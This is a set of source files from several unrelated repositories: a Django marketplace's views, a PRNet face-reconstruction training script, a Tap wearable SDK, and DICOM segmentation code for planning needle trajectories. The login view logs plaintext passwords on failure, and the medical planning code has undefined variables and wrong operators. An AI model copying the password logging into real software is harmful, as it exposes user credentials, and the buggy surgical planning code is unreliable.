r = Rating.objects.get_or_create(user = seller_profile, rated_by = profile, product = prod)[0]
r.rating = int(rating_input)
# new_rating = Rating(user=seller_profile,rating = int(rating_input), rated_by = profile, product = prod)
r.save()
update_rating(seller_profile)
check_rater(profile)
return render(request, 'orders.html', context_dict)
def check_rater(rater_profile):
sr = Rating.objects.filter(rated_by = rater_profile).order_by('-id')[:5]
sr_list = list(sr.values_list('rating',flat = True))
if len(sr_list) >= 3:
if sr_list.count(1) == 3:
rater_profile.strikes += 1
rater_profile.save()
print ('strikes ', rater_profile.strikes)
if len(sr_list)>= 5:
if sr_list.count(5) == 5:
rater_profile.strikes += 1
rater_profile.save()
```
#### File: marketplace/views/process_complaint.py
```python
from django.contrib.auth.models import User
from django.shortcuts import render
from ..models import Complaint, UserProfile
def process_complaint(request):
'''
*** Put the functions to process complaints and send them to db here - same method as the others
do request.POST['name value in template'] to access values
Users can submit a complaint for a user, if they get the username wrong
users will be told they submitted a complaint, but it will not necessarily be registered
bc the user has to be in our system
:param request:
:return:
'''
profile= UserProfile.objects.get(user=request.user)
context_dict = {
'username': request.user.username,
'money': profile.balance,
}
if User.objects.filter(username=request.POST['reported_user']).exists():
complained_user = User.objects.get(username = request.POST['reported_user'])
complaint_user_profile = UserProfile.objects.get(user = complained_user)
complaint_str = request.POST['complaint']
complaint = Complaint( user_id = complaint_user_profile,
complaint = complaint_str)
complaint.save()
return render(request,'complaint-submitted.html', context_dict)
```
#### File: marketplace/views/show_results.py
```python
from django.shortcuts import render
from ..models import Product, UserProfile
from ..date_checker import update_all
def show_results(request):
# Searching for products is handled by this function
context_dict = dict()
update_all()
if request.user.is_authenticated:
profile = UserProfile.objects.get(user=request.user)
context_dict['username'] = request.user.username
context_dict['money'] = profile.balance
(query, method, min, max) = (request.GET['query'],
request.GET['method'],
request.GET['minprice'],
request.GET['maxprice'], )
results = Product.objects.filter(option=method, is_active=True)
# print("ALL RESULTS: ", results)
if query: # TODO add logic to check for whitespace
results = Product.objects.filter(title__icontains=query,
option=method, is_active=True)
(context_dict['results'], context_dict['found']) = (results, True)
if not results:
(context_dict['results'], context_dict['found']) = (results, False)
else:
(context_dict['results'], context_dict['found']) = (results, True)
return render(request, 'results.html', context_dict)
```
#### File: marketplace/views/user_login.py
```python
from django.contrib.auth import authenticate, login
# from django.urls import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from ..models import UserProfile
from ..date_checker import update_all
def user_login(request):
update_all()
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
profile = UserProfile.objects.get(user=user)
if profile.verified_by_admin == True:
login(request, user)
context_dict = {
'username': request.user.username,
'money': profile.balance,
}
# Redirect to a success page.
# return HttpResponseRedirect(reverse('index'))
return render(request, 'index.html', context_dict)
else:
return HttpResponse("You've not been verified by an admin.")
else:
# Return a 'disabled account' error message
return HttpResponse("Your account is disabled.")
else:
# Bad login details were provided. So we can't log the user in.
print("Invalid login details: {0}, {1}".format(username, password))
return HttpResponse("Invalid login details supplied.")
# The request is not a HTTP POST, so display the login form.
# This scenario would most likely be a HTTP GET.
else:
# No context variables to pass to the template system, hence the blank dictionary object...
return render(request, 'login.html', {})
``` |
{
"source": "jnulzl/jnulzl-PRNet",
"score": 2
} |
#### File: face3d/mesh_numpy/vis.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from skimage import measure
from mpl_toolkits.mplot3d import Axes3D
def plot_mesh(vertices, triangles, subplot = [1,1,1], title = 'mesh', el = 90, az = -90, lwdt=.1, dist = 6, color = "grey"):
'''
plot the mesh
Args:
vertices: [nver, 3]
triangles: [ntri, 3]
'''
ax = plt.subplot(subplot[0], subplot[1], subplot[2], projection = '3d')
ax.plot_trisurf(vertices[:, 0], vertices[:, 1], vertices[:, 2], triangles = triangles, lw = lwdt, color = color, alpha = 1)
ax.axis("off")
ax.view_init(elev = el, azim = az)
ax.dist = dist
plt.title(title)
### -------------- Todo: use vtk to visualize mesh? or visvis? or VisPy?
```
#### File: jnulzl/jnulzl-PRNet/train.py
```python
import numpy as np
import os
import argparse
import tensorflow as tf
import cv2
import random
from predictor import resfcn256
import math
from datetime import datetime
class TrainData(object):
def __init__(self, train_data_file):
super(TrainData, self).__init__()
self.train_data_file = train_data_file
self.train_data_list = []
self.readTrainData()
self.index = 0
self.num_data = len(self.train_data_list)
def readTrainData(self):
with open(self.train_data_file) as fp:
temp = fp.readlines()
for item in temp:
item = item.strip().split()
self.train_data_list.append(item)
random.shuffle(self.train_data_list)
def getBatch(self, batch_list):
batch = []
imgs = []
labels = []
for item in batch_list:
img = cv2.imread(item[0])
label = np.load(item[1])
img_array = np.array(img, dtype=np.float32)
imgs.append(img_array / 256.0 / 1.1)
label_array = np.array(label, dtype=np.float32)
labels.append(label_array / 256 / 1.1)
batch.append(imgs)
batch.append(labels)
return batch
def __call__(self, batch_num):
if (self.index + batch_num) <= self.num_data:
batch_list = self.train_data_list[self.index:(self.index + batch_num)]
batch_data = self.getBatch(batch_list)
self.index += batch_num
return batch_data
else:
self.index = 0
random.shuffle(self.train_data_list)
batch_list = self.train_data_list[self.index:(self.index + batch_num)]
batch_data = self.getBatch(batch_list)
self.index += batch_num
return batch_data
def main(args):
# Some arguments
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
batch_size = args.batch_size
epochs = args.epochs
train_data_file = args.train_data_file
model_path = args.model_path
save_dir = args.checkpoint
if not os.path.exists(save_dir):
os.makedirs(save_dir)
# Training data
data = TrainData(train_data_file)
begin_epoch = 0
if os.path.exists(model_path + '.data-00000-of-00001'):
begin_epoch = int(model_path.split('_')[-1]) + 1
epoch_iters = data.num_data / batch_size
global_step = tf.Variable(epoch_iters * begin_epoch, trainable=False)
# Declay learning rate half every 5 epochs
decay_steps = 5 * epoch_iters
# learning_rate = learning_rate * 0.5 ^ (global_step / decay_steps)
learning_rate = tf.train.exponential_decay(args.learning_rate, global_step,
decay_steps, 0.5, staircase=True)
x = tf.placeholder(tf.float32, shape=[None, 256, 256, 3])
label = tf.placeholder(tf.float32, shape=[None, 256, 256, 3])
# Train net
net = resfcn256(256, 256)
x_op = net(x, is_training=True)
# Loss
weights = cv2.imread("Data/uv-data/weight_mask_final.jpg") # [256, 256, 3]
weights_data = np.zeros([1, 256, 256, 3], dtype=np.float32)
weights_data[0, :, :, :] = weights # / 16.0
loss = tf.losses.mean_squared_error(label, x_op, weights_data)
# This is for batch norm layer
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_step = tf.train.AdamOptimizer(learning_rate=learning_rate,
beta1=0.9, beta2=0.999, epsilon=1e-08,
use_locking=False).minimize(loss, global_step=global_step)
sess = tf.Session(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True)))
sess.run(tf.global_variables_initializer())
if os.path.exists(model_path + '.data-00000-of-00001'):
tf.train.Saver(net.vars).restore(sess, model_path)
saver = tf.train.Saver(var_list=tf.global_variables())
save_path = model_path
# Begining train
time_now = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
fp_log = open("log_" + time_now + ".txt","w")
iters_total_each_epoch = int(math.ceil(1.0 * data.num_data / batch_size))
for epoch in range(begin_epoch, epochs):
for iters in range(iters_total_each_epoch):
batch = data(batch_size)
loss_res, _, global_step_res, learning_rate_res = sess.run(
[loss, train_step, global_step, learning_rate], feed_dict={x: batch[0], label: batch[1]})
time_now_tmp = datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
log_line = '[' + time_now_tmp + ']:' + 'global_step:%d:iters:%d/epoch:%d,learning rate:%f,loss:%f' % (global_step_res, iters, epoch, learning_rate_res, loss_res)
print(log_line)
fp_log.writelines(log_line + "\n")
saver.save(sess=sess, save_path=save_path + '_' + str(epoch))
fp_log.close()
if __name__ == '__main__':
par = argparse.ArgumentParser(description='Joint 3D Face Reconstruction and Dense Alignment with Position Map Regression Network')
par.add_argument('--train_data_file', default='face3d/examples/trainDataLabel.txt', type=str, help='The training data file')
par.add_argument('--learning_rate', default=0.0002, type=float, help='The learning rate')
par.add_argument('--epochs', default=50, type=int, help='Total epochs')
par.add_argument('--batch_size', default=16, type=int, help='Batch sizes')
par.add_argument('--checkpoint', default='checkpoint/', type=str, help='The path of checkpoint')
par.add_argument('--model_path', default='checkpoint/256_256_resfcn256_weight', type=str, help='The path of pretrained model')
par.add_argument('--gpu', default='0', type=str, help='The GPU ID')
main(par.parse_args())
``` |
{
"source": "jnunez101/tap-python-sdk",
"score": 3
} |
#### File: tap-python-sdk/examples/example_linux.py
```python
from tapsdk import TapSDK, TapInputMode
from tapsdk.models import AirGestures
import os
os.environ["PYTHONASYNCIODEBUG"] = str(1)
import asyncio
import platform
import logging
from bleak import _logger as logger
import time
def notification_handler(sender, data):
"""Simple notification handler which prints the data received."""
print("{0}: {1}".format(sender, data))
def OnMouseModeChange(identifier, mouse_mode):
print(identifier + " changed to mode " + str(mouse_mode))
def OnTapped(identifier, tapcode):
print(identifier + " tapped " + str(tapcode))
def OnGesture(identifier, gesture):
print(identifier + " gesture " + str(AirGestures(gesture)))
def OnTapConnected(self, identifier, name, fw):
print(identifier + " Tap: " + str(name), " FW Version: ", fw)
def OnTapDisconnected(self, identifier):
print(identifier + " Tap: " + identifier + " disconnected")
def OnMoused(identifier, vx, vy, isMouse):
print(identifier + " mouse movement: %d, %d, %d" %(vx, vy, isMouse))
def OnRawData(identifier, packets):
# imu_msg = [m for m in packets if m["type"] == "imu"][0]
# if len(imu_msg) > 0:
# OnRawData.cnt += 1
# if OnRawData.cnt == 10:
# OnRawData.cnt = 0
# logger.info(identifier + " raw imu : " + str(imu_msg["ts"]))
for m in packets:
if m["type"] == "imu":
# print("imu")
OnRawData.imu_cnt += 1
if OnRawData.imu_cnt == 208:
OnRawData.imu_cnt = 0
# print("imu, " + str(time.time()) + ", " + str(m["payload"]))
if m["type"] == "accl":
# print("accl")
OnRawData.accl_cnt += 1
if OnRawData.accl_cnt == 200:
OnRawData.accl_cnt = 0
print("accl, " + str(time.time()) + ", " + str(m["payload"]))
OnRawData.imu_cnt = 0
OnRawData.accl_cnt = 0
OnRawData.cnt = 0
async def run(loop, debug=False):
if debug:
import sys
# loop.set_debug(True)
l = logging.getLogger("asyncio")
l.setLevel(logging.DEBUG)
h = logging.StreamHandler(sys.stdout)
h.setLevel(logging.INFO)
l.addHandler(h)
logger.addHandler(h)
client = TapSDK(loop)
# devices = await client.list_connected_taps()
x = await client.manager.connect_retrieved()
x = await client.manager.is_connected()
logger.info("Connected: {0}".format(x))
#await client.set_input_mode(TapInputMode("raw"))
#await client.register_air_gesture_events(OnGesture)
#await client.register_tap_events(OnTapped)
# await client.register_raw_data_events(OnRawData)
#await client.register_mouse_events(OnMoused)
#await client.register_air_gesture_state_events(OnMouseModeChange)
#await asyncio.sleep(3)
await client.set_input_mode(TapInputMode("raw", sensitivity=[0,0,0]))
await asyncio.sleep(3)
# await client.set_input_mode(TapInputMode("text"))
# await asyncio.sleep(3)
# await client.set_input_mode(TapInputMode("raw", sensitivity=[2,2,2]))
# await client.send_vibration_sequence([100, 200, 300, 400, 500])
await asyncio.sleep(50.0, loop=loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(run(loop, True))
```
#### File: backends/macos/inputmodes.py
```python
import logging
class TapInputMode:
def __init__(self, mode, sensitivity:list=[0,0,0]):
self._modes = {
"text" : {"name": "Text Mode", "code": bytearray([0x3,0xc,0x0,0x0])},
"controller" : {"name": "Controller Mode", "code": bytearray([0x3,0xc,0x0,0x1])},
"controller_text" : {"name": "Controller and Text Mode", "code": bytearray([0x3,0xc,0x0,0x3])},
"raw" : {"name": "Raw sensors Mode", "code": bytearray([0x3,0xc,0x0,0xa])}
}
self.sensitivity = sensitivity
if mode in self._modes.keys():
self.mode = mode
if mode == "raw":
self._register_sensitivity(sensitivity)
else:
logging.warning("Invalid mode \"%s\". Set to \"text\"" % mode)
self.mode = "text"
def _register_sensitivity(self, sensitivity):
if isinstance(sensitivity, list) and len(sensitivity) == 3:
sensitivity[0] = max(0, min(4,sensitivity[0])) # fingers accelerometers
sensitivity[1] = max(0, min(5,sensitivity[1])) # imu gyro
sensitivity[2] = max(0, min(4,sensitivity[2])) # imu accelerometer
self.sensitivity = sensitivity
self._modes["raw"]["code"] = self._modes["raw"]["code"][:4] + bytearray(sensitivity)
def get_command(self):
return self._modes[self.mode]["code"]
def get_name(self):
return self._modes[self.mode]["name"]
```
#### File: tap-python-sdk/tapsdk/parsers.py
```python
def tapcode_to_fingers(tapcode:int):
return '{0:05b}'.format(1)[::-1]
def mouse_data_msg(data: bytearray):
vx = int.from_bytes(data[1:3],"little", signed=True)
vy = int.from_bytes(data[3:5],"little", signed=True)
prox = data[9] == 1
return vx, vy, prox
def air_gesture_data_msg(data: bytearray):
return [data[0]]
def tap_data_msg(data: bytearray):
return [data[0]]
def raw_data_msg(data: bytearray):
'''
raw data is packed into messages with the following structure:
[msg_type (1 bit)][timestamp (31 bit)][payload (12 - 30 bytes)]
* msg type - '0' for imu message
- '1' for accelerometers message
* timestamp - unsigned int, given in milliseconds
* payload - for imu message is 12 bytes
composed by a series of 6 uint16 numbers
representing [g_x, g_y, g_z, xl_x, xl_y, xl_z]
- for accelerometers message is 30 bytes
composed by a series of 15 uint16 numbers
representing [xl_x_thumb , xl_y_thumb, xl_z_thumb,
xl_x_finger, xl_y_finger, xl_z_finger,
...]
'''
L = len(data)
ptr = 0
messages = []
while ptr <= L:
# decode timestamp and message type
ts = int.from_bytes(data[ptr:ptr+4],"little", signed=False)
if ts == 0:
break
ptr += 4
# resolve message type
if ts > raw_data_msg.msg_type_value:
msg = "accl"
ts -= raw_data_msg.msg_type_value
num_of_samples = 15
else:
msg = "imu"
num_of_samples = 6
# parse payload
payload = []
for i in range(num_of_samples):
payload.append(int.from_bytes(data[ptr:ptr+2],"little", signed=True))
ptr += 2
messages.append({"type":msg, "ts":ts, "payload":payload})
return messages
raw_data_msg.msg_type_value = 2**31
``` |
{
"source": "jnu-ose-biomedical-ultrasound-lab/dicomsegmentation",
"score": 3
} |
#### File: jnu-ose-biomedical-ultrasound-lab/dicomsegmentation/bloodHunt.py
```python
from scipy import io
import os
import pydicom
import numpy as np
import pickle
from skimage.filters import frangi, hessian
from skimage.feature import hessian_matrix, hessian_matrix_eigvals
from scipy.ndimage import rotate
from scipy import ndimage
from scipy import stats
from pylab import *
from scipy.ndimage import measurements,morphology
import matplotlib.patches as mpatches
from skimage import data
from skimage.filters import threshold_otsu
from skimage.segmentation import clear_border
from skimage.measure import label, regionprops
from skimage.morphology import closing, square
from skimage.color import label2rgb
from skimage.morphology import disk, dilation, binary_erosion, binary_closing
from skimage.filters import roberts, sobel
from scipy import ndimage as ndi
import matplotlib.pyplot as plt
from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from mpl_toolkits.mplot3d import Axes3D
from math import atan
import cv2
def load_patient(src_dir):
slices = [pydicom.read_file(src_dir + '/' + s, force=True) for s in os.listdir(src_dir)]
# slices.sort(key=lambda x: int(x.InstanceNumber))
#slices.sort(key=lambda x: int(si for len(slices)))
try:
slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])
except:
slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)
for s in slices:
s.SliceThickness = slice_thickness
return slices
def slicesInstanceNumber(slices):
image = np.stack([s.pixel_array for s in slices])
#image=frangi(image)
return image
def boneSegmentation(array, threshold):
image = np.where((array > threshold[0]) & (array < threshold[1]), 255, 0)
binary = np.where(image == 255, 1, 0)
return image, binary
def DICOMtoNumpyStack(slices):
image=slicesInstanceNumber(slices)
#image = np.stack([s.pixel_array for s in slices])
image = image.astype(np.int16)
image[image == -2000] = 0
for slice_number in range(len(slices)):
intercept = slices[slice_number].RescaleIntercept
slope = slices[slice_number].RescaleSlope
if slope != 1:
image[slice_number] = slope * image[slice_number].astype(np.float64)
image[slice_number] = image[slice_number].astype(np.int16)
image[slice_number] += np.int16(intercept)
return np.array(image, dtype=np.int16)
def DICOMtoNumpy(slices):
image = np.stack([s.pixel_array for s in slices])
#image=frangi(image)
return image
def count_items(img1_f, it):
im_open = morphology.binary_opening( \
img1_f,ones((9,5)), iterations=it)
labels_open, nbr_objects_open = measurements.label(im_open)
return labels_open
def outputPNG(image, out_dir):
for i in range(image.shape[0]):
img_path = out_dir + "/img_" + str(i).rjust(4, '0') + ".png"
cv2.imwrite(img_path, image[i])
def costMapGeneration(array):
# bone segmentation
threshold = [1250, 3000]
image1, binary1 = boneSegmentation(array, threshold)
# blood segmentation
image, binary = boneSegmentation(array, [1, 250])
img = np.uint8(image)
# vessel segmentation
threshold2 = [1, 300]
img=np.squeeze(img)
kernel = np.ones((6,6),np.float32)/36
img = cv2.filter2D(img,-1,kernel)
imgB0=img
# best image
img=np.squeeze(array)
img = cv2.filter2D(img,-1,kernel)
img0=img
img = cv2.erode(img, kernel, iterations=2)
img = cv2.dilate(img, kernel, iterations=2)
img2 = cv2.erode(img, kernel, iterations=1)
imf=img
imf = cv2.dilate(imf, kernel, iterations=1)
imf = cv2.erode(imf, kernel, iterations=1)
imf = np.where((imf < 100), 0, 255)
img11 = np.where((img < img.mean()), 0, 255)
img21 = np.where((img2 < img.mean()), 0, 255)
img3=img11+img21
img4=np.where((img3 != 0), 255, 0)
kernel = np.ones((2,2),np.float32)/4
img = cv2.filter2D(img0,-1,kernel)
hxx, hxy, hyy = hessian_matrix(img, sigma=1)
i1, i2 = hessian_matrix_eigvals(hxx, hxy, hyy)
img = cv2.erode(img, kernel, iterations=2)
imgh = np.where((i2 < i2.mean()), 255, 0)
img = cv2.dilate(img, kernel, iterations=2)
img20 = cv2.erode(img, kernel, iterations=20)
img20 = np.where((img20 < img20.mean()), 0, 255)
otherPlace=np.where((img20 <= 0), 255, 0)
otherPlace=np.where((otherPlace <= 0), 255, 0)
img10 = cv2.erode(img, kernel, iterations=10)
img10 = np.where((img10 < img10.mean()), 0, 255)
otherPlace10=np.where((img10 <= 0), 255, 0)
otherPlace10=np.where((otherPlace10 <= 0), 255, 0)
img55 = cv2.erode(img, kernel, iterations=5)
img55 = np.where((img55 < img55.mean()), 0, 255)
otherPlace55=np.where((img55 <= 0), 255, 0)
otherPlace55=np.where((otherPlace55 <= 0), 255, 0)
img15 = cv2.erode(img, kernel, iterations=5)
img15 = np.where((img15 < img15.mean()), 0, 255)
otherPlace15=np.where((img15 <= 0), 255, 0)
otherPlace15=np.where((otherPlace15 <= 0), 255, 0)
OP=otherPlace15+otherPlace+otherPlace55+otherPlace10
OP=np.where((OP > 0), 255, 0)
img2 = cv2.erode(img, kernel, iterations=3)
img = np.where((img < img.mean()), 0, 255)
img2 = np.where((img2 < img.mean()), 0, 255)
img5=img4-img2
img6=np.where((img5 != 0), 255, 0)
imgFrame=np.where((img20 <= img20.mean()), 0, 255)
victorFrame=np.where((imf != 0), 0, 255)
victorFrame=np.where((victorFrame <= 0), 0, 255)
tangoZone=victorFrame+imgh
bF=np.where((imgB0 < 255), 255, 0)
OP1=OP-imf
OP=np.where((OP <= 0), 255, 0)
superZone=bF-OP
superZone=np.where((superZone <= 0), 0, 255)
superZone=superZone-img11
superZone=np.where((superZone <= 0), 0, 255)
superZone=superZone-OP1
superZone=np.where((superZone <= 0), 0, 255)
comboZone=tangoZone+img11-(binary)
comboZone=np.where((comboZone <= 0), 255, 0)
comboZone=np.where((comboZone <= 200), 255, 0)
comboZone=np.where((comboZone <= 0), 255, 0)
targetZone=comboZone
comboZone=targetZone-otherPlace55
comboZone=np.where((comboZone <= 0) & (comboZone < 255), 0, 255)
binZone=superZone+comboZone
binZone=np.where((binZone > 0), 255, 0)
binV2=np.squeeze(binZone)
# bone cost
binV1=np.squeeze(binary)
# all squares now have a cost
costMapV=np.where(binV1==1,1000,1)
costMapB=np.where(binV2==1,9000,1)
# final costmap
costMap=np.squeeze(costMapV+costMapB)
return(costMap,imgB0)
#set target equal to some nice negative number
def trajectoryPlannerSimple(costMap,target0,target1):
A=costMap
costMap[target0,target1]=-30000000
topDown=sum(A[target0,0:target1]) #assuming directly above the target is 0 degrees of a circle
bottomDown=sum(A[target0,target1:]) # assuming this is 180 degrees opposite of the 'top'
leftEntrance=sum(A[0:target0,target1]) # 90 degrees, clockwise from top
rightEntrance=sum(A[target0:,target1]) # 270 degrees, clockwise from top
cost=np.array([topDown,leftEntrance,bottomDown,rightEntrance])
angles=np.array([0,90,180,270])
angleMin=angles[np.where(cost==cost.min())]
return(angleMin,cost.min())
def trajectoryPlanner(costMap,target0,target1):
A=costMap
cost=np.zeros(359)
cost[0]=sum(A[target0,0:target1]) #assuming directly above the target is 0 degrees of a circle
for ii in range(0,359):
costMap[target0,target1]=-30000000
A=rotate(costMap,ii)
cost[ii]=sum(A[target0,0:target1])
angles=plt.imshow(np.squeeze(binZone), cmap = plt.get_cmap('gray'))
angleMin=angles[np.where(cost==cost.min())]
return(angleMin,cost.min())
def segmentAngle(costMap,target0,target1):
angleMinSimple, costMinSimple=trajectoryPlannerSimple(costMap,target0,target1)
angleMin, costMin=trajectoryPlanner(costMap,target0,target1)
recAngle=np.array([angleMinSimple,angleMin])
costCompare=np.array([costMinSimple,costMin])
finalCostMin=costCompare.min()
finalAngle=recAngle[np.where(costCompare==finalCostMin)]
return(finalAngle,finalC5ostMin)
def maskedVesselSegmentation(array):
image, binary = boneSegmentation(array, [1, 300])
kernel = np.ones((4,4),np.float32)/16
img=np.squeeze(np.uint8(binary))
img = cv2.filter2D(img,-1,kernel)
img = cv2.erode(img, kernel, iterations=1)
img = cv2.dilate(img, kernel, iterations=1)
img = cv2.erode(img, kernel, iterations=1)
img=frangi(img)
hxx, hxy, hyy = hessian_matrix(img, sigma=3)
i1, i2 = hessian_matrix_eigvals(hxx, hxy, hyy)
img=i2/abs(i2.max())
img=np.squeeze(np.uint8(img))
threshold=img.max()-img.mean()
img=np.squeeze(np.uint8(img))
img = cv2.erode(img, kernel, iterations=1)
img=np.squeeze(np.uint8(img))
img = cv2.dilate(img, kernel, iterations=1)
threshold=img.max()-img.mean()
image = np.where((img > threshold), 255, 0)
return(image)
def trajectoryPlanner3D(costMap,target0,target1,target2):
A=costMap
A[target0,target1,target2]=-30000000
distance=360*3
xx=np.array(np.zeros(360))
yy=xx
zz=yy
costX0=sum(A[0:target0,target1,target2])
costY0=sum(A[target0,0:target1,target2])
costZ0=sum(A[target0,target1,0:target2])
for xi in range(0,359):
xplane=np.squeeze(A[target0,:,:])
x2=rotate(xplane,xi)
xx[xi]=sum(x2[0,0:target1])+sum(x2[1,0:target2])
costX=xx.min()
xAng=np.where((xx==xx.min()) & (xx!=0))
for yi in range(0,359):
yplane=np.squeeze(A[:,target1,:])
y2=rotate(yplane,yi)
yy[yi]=sum(y2[0,0:target0])+sum(y2[1,0:target2])
costY=yy.min()
yAng=np.where((yy==yy.min()) & (yy!=0))
for zi in range(0,359):
zplane=np.squeeze(A[:,:,target2])
z2=rotate(zplane,zi)
zz[zi]=sum(z2[0,0:target0])+sum(z2[1,0:target1])
costZ=zz.min()
zAng=np.where((zz==zz.min()) & (zz!=0))
minCost=np.array([costX,costY,costZ])
if costX > costX0:
xAng=0
minCost[0]=costX0
if costY > costY0:
yAng=0
minCost[1]=costY0
if costZ > costZ0:
zAng=0
minCost[2]=costZ0n
totalCost=sum(minCost)
xPro=minCost[0]/totalCost
yPro=minCost[1]/totalCost
zPro=minCost[2]/totalCost
outVec=np.zeros(3)
outVec[0]=np.asarray(xAng**xPro)
outVec[1]=np.asarray(yAng**yPro)
outVec[2]=np.asarray(zAng**zPro)
return(xAng,yAng,zAng,minCost,outVec)
def wheelCost(costMap,target0,target1):
# Calculate cost for each 45 degree increment.
a1=np.trace(costMap[:target0,:target1]) # 1 + 5: 315
a2=np.sum(costMap[:target0,:target1], axis=0)[1] # 2 + 5: 0
a3=np.trace(np.rot90(costMap[:target0,(target1-1):])) # 5 + 3: 45
a4=np.sum(costMap[:target0,(target1-1):], axis=1)[1] # 5 + 6: 90
a5=np.trace(costMap[(target0-1):,(target1-1):]) # 5 + 9: 125
a6=np.sum(costMap[(target0-1):,(target1-1):], axis=0)[0] # 5 + 8: 180
a7=np.trace(np.rot90(costMap[(target0-1):,:target1])) # 7 + 5: 225
a8=np.sum(costMap[(target0-1):,:target1], axis=1)[0] # 4 + 5: 270
a=np.array([a1,a2,a3,a4,a5,a6,a7,a8])
anglePos=np.where(a==a.min())
return(anglePos,a)
def maskFusion(img,mask):
# Combine the masks.
fused=img-mask
img=np.where((fused >= 0), 255, 0)
outImg=np.where((img == 0), 255, 0)
return(outImg)
def costSlicer(outImg,binary):
# fuse the cost maps of blood and bone
if abs(outImg.max()==0):
outImg=outImg
else:
outImg=outImg/abs(outImg.max())
bloodImg=np.uint8(outImg)
bloodImg=np.where(bloodImg>=1,9000,0)
if abs(binary.max()==0):
boneImg=np.uint8(abs(binary/binary.max()))
else:
boneImg=np.uint8(abs(binary))
boneImg=np.where(boneImg>=1,6000,0)
costSlice=np.squeeze(bloodImg+boneImg)
return(costSlice)
def starPoint(anglePos1):
degree=anglePos1[0].max()
if (degree >= 0) & (degree <= 30):
cd = 0
if (degree >> 30) & (degree <= 60):
cd = 1
if (degree >> 60) & (degree <= 105):
cd = 2
if (degree >> 105) & (degree <= 150):
cd = 3
if (degree >> 150) & (degree <= 195):
cd = 4
if (degree >> 195) & (degree <= 240):
cd = 5
if (degree >> 240) & (degree <= 285):
cd = 6
if (degree >> 285) & (degree <= 330):
cd = 7
if (degree >> 330) & (degree <= 359):
cd = 0
if cd==0: # val
dx=0
dy=-1
if cd==1: # val
dx=1
dy=-1
if cd==2:# val
dx=1
dy=0
if cd==3:# val
dx=1
dy=1
if cd==4: #val
dx=0
dy=1
if cd==5:# val
dx=-1
dy=1
if cd==6:# val
dx=-1
dy=0
if cd==7:# val
dx=-1
dy=-1
return(dx,dy,cd)
def endPointCalculator(anglePos,dimsize1,dimsize2,targetA,targetB):
cord1=0
cord2=0
# Note: This values require debugging and testing.
if anglePos==0:
cord1=0
cord2=(dimsize2-1)
if anglePos==1:
cord1=targetA
cord2=(dimsize2-1)
if anglePos==2:
cord1=(dimsize1-1)
cord2=(dimsize2-1)
if anglePos==3:
cord1=(dimsize1-1)
cord2=targetB
if anglePos==4:
cord1=(dimsize1-1)
cord2=0
if anglePos==5:
cord1=targetA
cord2=0
if anglePos==6:
cord1=0
cord2=0
if anglePos==7:
cord1=0
cord2=targetB
return(cord1,cord2)
def sphereCost(costMap,target0,target1,target2):
# This function was intended to calculate 26 possible trajectors for the input point.
# First, you size length of each dimension in the 3D array.
# Then, wheelCost is used to calculate the lowest cost angle (anglePos) and cost value vector (a) for each plane.
# Following this, the lowest cost trajectory is planned. The end point of each trajectory is calculated.
# All values are compared to find the lowest total cost trajectories.
# The cost map values in between the target and end point values will be converted to a high contrast value to allow for easier plotting.
costMap=np.asarray(costMap)
xsize=len(np.squeeze(costMap[:,0,0]))
ysize=len(np.squeeze(costMap[0,:,0]))
zsize=len(np.squeeze(costMap[0,0,:]))
costMap=costMap+1
direct1=np.sum(costMap[0:target0,0:target1,0:target2])
direct2=np.sum(costMap[target0:(xsize-1),target1:(ysize-1),target2:(zsize-1)])
axisx1=np.sum(costMap[0:target0,0,0])
axisx1=np.sum(costMap[0:target0,target1,target2])
axisx2=np.sum(costMap[target0:(xsize-1),0,0])
axisx2=np.sum(costMap[target0:(xsize-1),target1,target2])
minX=min([axisx1,axisx2])
axisy1=np.sum(costMap[0,0:target1,0])
axisy1=np.sum(costMap[target0,0:target1,target2])
axisy2=np.sum(costMap[0,target1:(ysize-1),0])
axisy2=np.sum(costMap[target0,target1:(ysize-1),target2])
minY=min([axisy1,axisy2])
axisz1=np.sum(costMap[0,0,0:target2])
axisz1=np.sum(costMap[target0,target1,0:target2])
axisz2=np.sum(costMap[0,0,target2:(zsize-1)])
axisz2=np.sum(costMap[target0,target1,target2:(zsize-1)])
minZ=min([axisz1,axisz2])
defFrame=min([axisx1,axisx2,axisy1,axisy2,axisz1,axisz2,direct1,direct2])
if (defFrame==axisz1) or (defFrame==axisy1) or (defFrame==axisz1) or (defFrame==direct1):
dx=0
dy=0
dz=0
if defFrame==axisz2:
dx=0
dy=0
dz=(zsize-1)
if defFrame==axisy2:
dx=0
dy=(ysize-1)
dz=0
if defFrame==axisx2:
dx=(xsize-1)
dy=0
dz=0
if defFrame==direct2:
dx=(xsize-1)
dy=(ysize-1)
dz=(zsize-1)
# Here you would use the wheelCost algorithm for each plane/
#XY
anglePos1,a1=wheelCost(np.squeeze(costMap[:,:,target2]),target0,target1)
tracA=np.sum(costMap[0:target0,0:target1,target2])
tracB=np.sum(costMap[0:target0,target1,0:target2])
tracC=np.sum(costMap[target0,0:target1,0:target2])
#XZ
anglePos2,a2=wheelCost(np.squeeze(costMap[:,target1,:]),target0,target2)
anglePos3,a3=wheelCost(np.squeeze(costMap[target0,:,:]),target1,target2)
cordA1,cordA2=endPointCalculator(anglePos1,xsize,ysize,target0,target1)
x=np.sort([target0,cordA1])
y=np.sort([target1,cordA2])
trajA=np.sum(np.squeeze(costMap[x[0]:x[1],y[0]:y[1],target2]))
cordB1,cordB2=endPointCalculator(anglePos2,xsize,zsize,target0,target2)
x=np.sort([target0,cordB1])
z=np.sort([target2,cordB2])
trajB=np.sum(np.squeeze(costMap[x[0]:x[1],target1,z[0]:z[1]]))
trajAB=np.sum(np.squeeze(costMap[x[0]:x[1],y[0]:y[1],target2]))
